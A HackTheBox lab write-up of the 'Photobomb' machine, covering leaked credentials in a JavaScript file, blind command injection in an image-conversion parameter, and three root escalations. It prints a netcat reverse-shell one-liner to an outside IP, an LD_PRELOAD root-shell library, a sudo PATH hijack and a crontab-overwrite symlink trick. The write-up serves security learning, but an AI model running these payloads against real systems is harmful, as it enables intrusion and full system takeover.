HackTheBox — Photobomb

ARZ101
5 min readFeb 11, 2023

Photobomb from HackTheBox was an easy machine that involved finding credentials from a javascript file, giving access to a page which generates an image file, the POST parameter responsible for file extension was vulnerable to blind command injection, giving a shell as wizard user, escalation to root was straight forward and could be done in many ways. one being abusing PATH variable as find command was not being used with it’s absolute path

NMAP

Nmap scan report for 10.10.11.182
Host is up (0.093s latency).
Not shown: 54171 closed tcp ports (conn-refused), 11362 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visiting the web server, it’s going to redirect us to photobomb.htb so we need to add it in hosts file

It shows a link which takes us to /printer that asks for credentials

We can find the credentials by checking the source of the site which shows a js file having the credentials

With this, we can access the printer page

What this page does it converts the image into either png or jpg into the specified dimensions displayed on the site

If we remove any of the POST parameter when downloading the file, it’s going to show a stack error revealing that it’s using ruby sinatra server

Foothold

We can see from the stack error that the filetype parameter is being checked if it contains either png or jpeg, so we can try command injection there, I tried appending the id command with ; but it didn't returned any output

So I tried making a curl request to my python server which was successful

Using openbsd nc’s reverse shell payload by making it url encoded

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f

Stabilizing the shell with python3

Privilege Escalation (root)

Running sudo -l shows that we can run cleanup.sh as a root user

Method 1

From the output of sudo -l, we can see this is allowing us to set environment variables due to SETENV enabled, which means we can set LD_PRELOAD path which contains the path to the shared library that will be loaded before anything else, so we can abuse this by compiling this program into a shared library which will set bash a SUID and will spawn it with bash -p giving us a root shell

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
gcc -fPIC -shared -nostartfiles -o ./load.so ./test.c
sudo LD_PRELOAD=/tmp/load.so /opt/cleanup.sh

Method 2

Checking the script which we can run

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

This script is switching to /home/wizard/photobomb, where with -s it checks if photobomb.log exists and is empty, with -L and ! it checks if the logfile isn't a symlink to avoid symlinking and then overwrites the content of photobomb.log to photobomb.log and clears out the the contents of the log file, then with find it look for all jpg files and makes root the owner of those images

Now here find isn't being ran through it's absolute path which means that we can abuse it by making a file which will spawn bash for us by setting environment variables through which we can achieve PATH variable exploit

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Method 3

Going back to the script, the if condition checks for photobomb.log but not photobomb.log.old so we can symlink the old log file with /etc/crontab and include the crontab in the original log file which will basically overwrite the crontab file, therefore symlinking the file with crontab

ln -sf /etc/crontab photobomb.log.old

Now place a bash script which will make bash a SUID or you can place a reverse shell there

#!/bin/bash
chmod +s /bin/bash
* * * * * root /tmp/shell.sh

Putting the crontab in photobomb.log file which will overwrite the old log file which will then overwrite the crontab file, making bash a SUID and then we can spawn bash with -p to execute it as the SUID owner which is root

References

--

--